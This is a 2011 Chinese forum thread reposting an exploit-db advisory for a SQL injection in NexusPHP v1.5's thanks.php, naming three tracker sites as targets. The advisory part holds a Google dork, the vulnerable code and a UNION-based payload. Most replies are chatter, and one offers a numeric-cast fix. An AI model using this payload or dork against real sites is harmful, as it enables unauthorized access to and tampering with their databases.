扫描二维码关注官方公众号
12下一页
返回列表 发布新帖

[求助/讨论] chinahdtv cnscg 3dpt 都可以注入修改数据库的漏洞 !

4068 22
发表于 2011-11-22 21:22:22 | 查看全部 阅读模式

来吧兄弟,一起玩一起讨论!

您需要 登录 才可以下载或查看,没有账号?注册

×
chinahdtv cnscg 3dpt  都可以注入修改数据库的漏洞 !  今天发现NexusPHP  SQL注入漏洞 !

http://www.exploit-db.com/exploits/17946/

# Exploit Title: Nexusphp.v1.5 SQL injection Vulnerability  

# Google Dork: intitle:nexusphp  

# Date: 2011-10-08  

# Author: flyh4t  

# Software Link: http://sourceforge.net/projects/nexusphp/  

# Version: nexusphp.v1.5  

# Tested on: linux+apache  

# CVE : CVE-2011-4026  

   

   

Nexusphp is BitTorrent private tracker scripts written in PHP   

The codes is here http://sourceforge.net/projects/nexusphp/  

There is a sql injectiong Vulnerability in thanks.php.  

   

-----------------------vul code-------------------  

//thanks.php  

if ($_GET['id'])  

stderr("Party is over!", "This trick doesn't work anymore. You need to click the button!");  

$userid = $CURUSER["id"];  

$torrentid = $_POST["id"];  

$tsql = sql_query("SELECT owner FROM torrents where id=$torrentid");  

$arr = mysql_fetch_array($tsql);  

-----------------------vul code end-------------------  

   

$_POST["id"] is not checked, lead a sql injection Vulnerability  

   

-----------------------exploit-------------------  

   

_POST[id] : -1 union select version()>4/*  

   

-----------------------exploit end -------------------



评论22

披甲熊Lv.5 发表于 2011-11-22 21:29:37 | 查看全部
哎呦喂 看不懂啊 你自己发现的啊?去联系网站管理啊 说不定给你大红包啊 哈哈!这个沙发是我的!
回复 点赞

使用道具 举报

NevertheleLv.6 发表于 2011-11-22 21:35:47 | 查看全部
披甲熊 发表于 2011-11-22 21:29
哎呦喂 看不懂啊 你自己发现的啊?去联系网站管理啊 说不定给你大红包啊 哈哈!这个沙发是我的!

你真够水的,这三个站,有两个没有,一个用的是傻瓜密码,不怕
回复 点赞

使用道具 举报

披甲熊Lv.5 发表于 2011-11-22 21:38:51 | 查看全部
Neverthele 发表于 2011-11-22 21:35
你真够水的,这三个站,有两个没有,一个用的是傻瓜密码,不怕

必须得水 再说咱水也不是几个字的回复 都是高质量高要求的 今天还没拿硬币呢 你那?

回复 点赞

使用道具 举报

NevertheleLv.6 发表于 2011-11-22 21:41:05 | 查看全部
披甲熊 发表于 2011-11-22 21:38
必须得水 再说咱水也不是几个字的回复 都是高质量高要求的 今天还没拿硬币呢 你那?

{:5_397:}我基本上是不会捡的,感觉这东西和每天发帖数有关
升级有嘛用,虚拟的东西不要太迷心~  详情 回复
发表于 2011-11-22 21:56
无关精要,我在512都两个月了吧应该,我要睡了,你玩吧  详情 回复
发表于 2011-11-22 21:46
你得抓紧了 要不过两天我升级就撵上你了!  详情 回复
发表于 2011-11-22 21:42
回复 点赞

使用道具 举报

雪豹softLv.10 发表于 2011-11-22 21:42:07 | 查看全部
真是高手呀{:1_87:}
回复 点赞

使用道具 举报

叶落无声@2Lv.6 发表于 2011-11-22 21:46:53 | 查看全部
完全表示看不懂{:2_141:}
回复 点赞

使用道具 举报

wosiduyuaLv.8 发表于 2011-11-22 21:56:51 | 查看全部
软件检测的结果吧?
回复 点赞

使用道具 举报

残情弑爱 发表于 2011-11-22 21:59:11 | 查看全部
好高深的东西,外行只能来看看热闹了
回复 点赞

使用道具 举报

luoxm@2Lv.9 发表于 2011-11-22 22:24:26 | 查看全部
我是外行,只能看热闹了
回复 点赞

使用道具 举报

兆侗Lv.10 发表于 2011-11-23 00:07:15 | 查看全部
都看不懂,可是见到水王都来了{:1_87:}
回复 点赞

使用道具 举报

PiaLv.8 发表于 2011-11-23 00:28:57 | 查看全部
希望尽快修补吧
回复 点赞

使用道具 举报

SkyrunnerLv.5 发表于 2011-11-23 01:00:00 | 查看全部
PHP還沒學到,現在被C++ data structure 玩弄中
回复 点赞

使用道具 举报

123ABDLv.9 发表于 2011-11-23 12:46:31 | 查看全部
LZ技术帝,小白只能围观了
回复 点赞

使用道具 举报

power12317@2Lv.5 发表于 2011-11-23 14:04:05 | 查看全部
早就知道了,于是修复了。
修复方法 :

  1. $torrentid = $_POST["id"];
复制代码
改为
  1. $torrentid =0 + $_POST["id"];
复制代码
回复 点赞

使用道具 举报

zhouyu7725Lv.8 发表于 2011-11-23 15:44:39 | 查看全部
技术性的
回复 点赞

使用道具 举报

浪滔天 发表于 2011-11-23 22:22:36 | 查看全部
太高深 只能膜拜{:3_153:}
回复 点赞

使用道具 举报

albertshi@2Lv.9 发表于 2011-11-24 10:57:10 | 查看全部
看不懂啊看不懂。。。
回复 点赞

使用道具 举报

albertshi@2Lv.9 发表于 2011-11-24 10:58:14 | 查看全部
power12317 发表于 2011-11-23 14:04
早就知道了,于是修复了。
修复方法 :

你应该补充在你的建站贴呢,呵呵
回复 点赞

使用道具 举报

power12317@2Lv.5 发表于 2011-11-24 11:04:29 | 查看全部
albertshi 发表于 2011-11-24 10:58
你应该补充在你的建站贴呢,呵呵

呵呵 漏洞什么的 当然是有个特定的站 Nexusphp技术维护联盟: http://nexusphp.org  
回复 点赞

使用道具 举报

回复

您需要登录后才可以回帖 登录 | 注册

本版积分规则

淘宝小店

邀请码

VIP会员

微信客服

公众号

微信群

投诉/建议联系

support@gebi1.cn

未经授权禁止转载,复制和建立镜像,
如有违反,追究法律责任
  • 关注公众号
  • 添加微信客服
Copyright © 2001-2024 隔壁网 版权所有 All Rights Reserved. 粤ICP备14056481号-1
关灯 在本版发帖
扫一扫添加微信客服
返回顶部
快速回复 返回顶部 返回列表